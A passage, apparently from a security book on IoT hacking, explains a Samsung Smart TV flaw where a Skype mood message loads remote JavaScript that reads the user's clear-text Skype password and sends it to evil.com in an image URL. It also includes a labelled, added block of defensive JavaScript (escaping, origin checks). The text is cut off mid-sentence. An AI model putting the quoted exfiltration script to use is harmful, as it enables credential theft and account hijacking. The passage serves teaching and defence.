Abusing the Internet of Things

exeDSP processes handle all the functionality of the TV. This is actually a security bug in the
way Samsung modified the JavaScript interpreter.
The researchers took things further with a scenario in which the mood message of the
malicious Skype user was the following:


<script src="http://tv.isecpartners.com/exfil.js"></script>

Now assume exfil.js contains JavaScript code like this:

// Samsung-specific plugin API; on the affected firmware this returned the Skype password in clear text
creds = PluginAPIMgr.GetMyStorageInfo();
// leak the value to the attacker's server by embedding it in an image URL
new Image().src="http://evil.com/"+creds;

The researchers found that the GetMyStorageInfo() call actually returned the value of the
user’s Skype password in clear text. This malicious code then sends the credentials to the
evil.com server as a parameter. The attacker, who owns evil.com, can then look at the web
server logs to note the password. At this point, the attacker can quickly log into Skype and
hijack the victim’s account.
Grattafiori and Yavor have found multiple exploitable conditions such as this issue with
Skype. Web browser designers have learned the hard way to sandbox client-side code such as
JavaScript and respect the same-origin policy. These are fundamental and well-known security
concepts in the world of web security. Samsung’s implementation is counter to this fundamental
security principle. JavaScript code loaded from external domains should not be
allowed to execute with the same privileges as that of code loaded from the local filesystem.
Furthermore, the tweaking of the JavaScript interpreter to introduce custom functionality
should be carefully designed to make sure no security bugs are being introduced. The lesson
to be learned from this example is that security fundamentals such as validation of data and
adherence to same-origin policies are basic security requirements that ought to be baked into
the design of Smart TVs and other IoT devices. These are not complex attacks, and they are
based on attack vectors the industry has known about for more than a decade.
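Two of the controls the paragraph calls for, as an added example that is not code from the book or from Samsung: the mood message is rendered as inert text rather than HTML (data validation), and the privileged PluginAPIMgr bridge refuses calls from any origin other than the app's own (same-origin enforcement) and never returns the raw password. The API names come from the text; the bridge, LOCAL_APP_ORIGIN, the fake storage API and the explicit callerOrigin argument are assumptions made so the checks can run stand-alone.

```javascript
// Added example: defensive counterparts to the Smart TV Skype flaw.
// Assumptions: the runtime can tell the bridge which document origin is
// calling it; here callerOrigin is passed explicitly instead.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Control 1: treat the mood message as untrusted data. Escaping the HTML
// metacharacters turns a <script src=...> payload into harmless text.
function escapeMoodMessage(raw) {
  return String(raw).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Assumed origin of the TV app's own bundled scripts.
const LOCAL_APP_ORIGIN = 'file://';

// Constructed stand-in for the real storage API, returning a fake record.
const FAKE_STORAGE_API = {
  GetMyStorageInfo() {
    return { user: 'alice', password: 'constructed-secret', server: 'skype.example' };
  },
};

// Control 2: gate the privileged API on caller origin, and strip the secret
// even for trusted callers so a leak cannot hand out the password itself.
function createPrivilegedBridge(realApi, allowedOrigin = LOCAL_APP_ORIGIN) {
  return {
    GetMyStorageInfo(callerOrigin) {
      if (callerOrigin !== allowedOrigin) {
        throw new Error(`privileged API denied for origin ${callerOrigin}`);
      }
      const safe = { ...realApi.GetMyStorageInfo() };
      delete safe.password;
      return safe;
    },
  };
}

// Returns true when a call from the given origin is rejected.
function isDenied(bridge, origin) {
  try {
    bridge.GetMyStorageInfo(origin);
    return false;
  } catch (e) {
    return true;
  }
}
```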


Various other researchers have found additional flaws in Samsung Smart TVs that exploit basic security
mechanisms, including input validation. One notable researcher in this field is SeungJin Lee, who,
along with Seungjoo Kim, found and reported multiple vulnerabilities to Samsung. Their research is worth
reading and available online.

IoT device manufacturers such as Samsung definitely need to do a better job of implementing
these basic principles to protect their business as well as the privacy of their loyal
customers. A simple attack like this can be exploited to install a persistent backdoor on a
Smart TV, allowing the attacker to continuously steal credentials and even remotely view the


UNDERSTANDING AND EXPLOITING THE APP WORLD 145